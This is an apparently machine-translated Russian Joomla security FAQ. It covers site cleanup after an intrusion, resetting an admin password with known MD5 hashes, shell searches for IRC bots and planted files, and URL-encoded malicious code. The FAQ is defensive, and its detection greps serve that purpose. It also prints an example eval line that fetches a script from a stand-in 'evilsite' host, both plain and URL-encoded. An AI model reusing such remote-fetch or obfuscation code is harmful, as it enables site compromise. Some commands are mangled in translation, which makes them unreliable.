11. Сброс пароля критических снова: Вы должны сбросить passwards снова теперь, когда ваш сервер, наконец, очищенный от всех возможных, скрытых троянских коней.
12. Перестроить сайта: Если вы не в состоянии восстановить из чистых резервных копий, восстановления весь сайт с использованием оригинальных, предварительно устанавливает трещины. Используйте только последние стабильные версии все программное обеспечение, и проверить список уязвимых расширений
13. Обзор безопасности процессов: Следуйте стандартной меры безопасности для важных настроек в php.ini, globals.php, configuration.php, Htaccess, и т.д..

14. Обзор процессов резервного копирования: Если у вас ее еще нет, добавить надежного резервного копирования вашей практики администрации сайта.
15. Не терять бдительность: Злоумышленники часто возвращаются неоднократно. Внимательно следить за вашей сырья журналы для подозрительной деятельности.

Как сбросить пароль администратора?

Введение

Примечание: Данный метод предназначен для версии Joomla вплоть до 1.0.12. Для более поздних версий Joomla и Joomla 1.5.xx версии пожалуйста, используйте этот (FAQ)

Потому что пароли хранятся с использованием односторонней хэш MD5 которая предотвращает восстановление пароля, вы не можете восстановить существующий пароль, но Вы можете сбросить его, чтобы новый пароль, отредактировав поле пароля в базе данных. В следующие направления, вы установите значение пароля MD5 на известное значение, а затем войдите в систему с использованием пароля, который соответствует этому значению. Зайдя на сайт, вы можете изменить пароль еще раз с помощью обычных Joomla! Экраны доступа пользователей.

Расширение пароль шифрования Примечание Joomla! 1.0.13 и Joomla! 1.5.x Этот метод работает с новой соли повышенной пароли. Это потому, что Joomla! будет автоматически обновлять пароли в прежнем формате.

Направления

1. Использование утилиты MySQL, такие как PhpMyAdmin или MySQL Query Browser.

2. Открыть нужную базу данных и выберите таблицу, jos_users. (Изменения по умолчанию префикс таблиц, "jos_" к Вашему столу префикс, если он отличается).

3. Выберите запись (или строку таблицы) для учетной записи администратора. (По умолчанию Супер Администратор Пользователь № 62.)

4. Копирование и вставка известно MD5 хеш в поле пароля. Вы можете использовать один из следующих примеров. Внимание: Вы должны вставлять хэш-значение пароля, а не сам пароль. Вы можете использовать любой из следующих hashs, или создать свой собственный, используя один из MD5 средства, перечисленные ниже.

 

password = "MD5 hash of password"
------------------------------------------------------
admin = 21232f297a57a5a743894a0e4a801fc3
secret = 5ebe2294ecd0e0f08eab7690d2a6ee69
OU812 = 7441de5382cf4fecbaa9a8c538e76783

5. Сохранить запись пользователя.

6. Точка браузер на ваш сайт и войти под учетной записи администратора Super вы просто изменить.

7. ВАЖНО: После входа в систему, используя интерфейс Joomla изменить пароль к тому, который знаете только вы. Этот шаг имеет жизненно важное значение, как это будет "соль" Ваш новый пароль, тем самым добавив дополнительный уровень безопасности на вершине хэш MD5.

Примечание: Этот метод может быть использован для изменения любого другого пароля счета. Вы можете также использовать его для изменения имен пользователей.

Создание собственной хэш MD5 от пароля по вашему выбору

Кроме того, вы можете установить пароль на стоимость вашего собственного выбора. Использование инструментов, таких как следующие, для создания собственного сильного зашифрованный пароль. Используйте выше направлениях, как только вы порожденных хэш с этими инструментами.

Онлайн MD5 хэш инструменты создания

* JavaScript MD5 - http://pajhome.org.uk/crypt/md5/
* MD5er - http://www.md5er.com/

Бесплатные утилиты MD5 для загрузки

* MD5 и хеширование ЖКХ - http://www.digital-detective.co.uk/freetools/md5.asp
* SlavaSoft HashCalc - http://www.slavasoft.com/hashcalc/overview.htm

Другие инструменты MD5

* Есть много бесплатных онлайн и загружаемые MD5 коммунальные услуги. Google "MD5 хэш-инструмент"

Как мне найти подвиги использованием оболочки * NIX?

Проверка активных процессов

Используйте "PS" команду, чтобы искать четным или неизвестные процессы, если вы не уверены, что искать там, пользователь "NetStat-п | GREP IRC" и / или "NetStat-е | GREP 666" и искать порты 6666, 6667, 6668, 6669, эти общие порты, используемые для запуска IRC-ботов, они могут иметь название "IRC", перечисленные в отношении них, или, возможно, "HTTPD" или иногда других регулярных имена услуг.

Проверьте кронтаб

Проверьте ваш кронтаб и посмотреть, если есть странная запись, они используются во многих подвигов, чтобы перезагрузить IRC-ботов, даже тогда, когда администраторы или автоматизированные мониторы процесса используются, чтобы убить изгоев процесса.

Проверьте скрытые файлы или каталоги

Проверьте скрытые файлы или каталоги вы не ожидаете увидеть, начиная с тех, "." (Точки), а также искать "." (Точка, пробел) часто предпочитают, чтобы попытаться поймать поиск скрытых директорий.

Другие примеры поисков, которые могут помочь придавить подвиги и / или неожиданный файлов и папок:

find /home -type f | xargs grep -l MultiViews
find . -type f | xargs grep -l base64_encode <<< this can produce false positives, it is valid in many mail/graphics scripts
find . -type f | xargs grep -l error_reporting
find / -name "[Bb]itch[xX]"
find / -name "psy*"
ls -lR | grep rwxrwxrwx > listing.txt

Что это за странные (URL-кодировке) символов делает в своем коде?

Обзор

Злоумышленники иногда скрыть код от посторонних глаз по URL-кодирование он.

Цель URL-кодирование является предоставление Номера URL совместимы символы, которые передаются через URL. Есть много законных причин для этого, например, электронной почты скрывается от спаммеров, дело с пробелами в именах файлов. и т.д.

Однако, если вы найдете странным, URL-кодированного текста в файлах вашего сайта, вы должны исследовать сразу. URL закодированный текст очень легко перевести использованием PHP, JavaScript, или один из многих бесплатно, онлайн-переводчики.

Вот несколько тривиальных, неработающие примеры URL закодированный текст:

Original	URL Encoded
this line has spaces	this%20line%20has%20spaces
eval(evil_script(http://www.evilsite/?evilscript.pl"));	%65val%28%65%76il_%73cri%70t %28%68tt%70%3A//%77%77%77. %65%76il%73ite/%3F%65%76il%73 cript.%70l%22%29%29%3B